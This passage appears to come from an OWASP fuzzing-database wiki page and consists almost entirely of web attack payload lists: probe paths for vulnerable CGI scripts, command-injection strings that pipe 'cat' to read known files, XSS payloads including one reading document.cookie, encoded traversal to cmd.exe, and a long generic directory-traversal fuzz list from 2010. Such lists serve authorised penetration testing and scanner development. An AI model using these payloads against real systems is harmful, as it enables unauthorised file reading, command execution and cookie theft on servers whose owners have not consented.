eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
